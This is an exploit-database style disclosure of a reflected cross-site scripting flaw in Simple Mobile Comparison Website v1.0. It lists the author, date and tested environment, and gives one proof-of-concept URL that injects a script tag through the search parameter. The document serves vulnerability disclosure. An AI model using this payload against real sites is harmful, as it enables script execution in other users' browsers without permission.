# Exploit Title: Simple Mobile Comparison Website v1.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)
# Author: Ayedh AlQahtani
# Discovery Date: 2022-03-18
# Vendor Homepage: https://www.sourcecodester.com/
# Tested Version: v1.0
# Tested on: XAMPP, Windows 11 Pro x64 es
# Vulnerability Type: Reflected Cross-Site Scripting (XSS)

# Proof of Concept:

http://<ip>/mcw/?search="><script>alert(1)</script>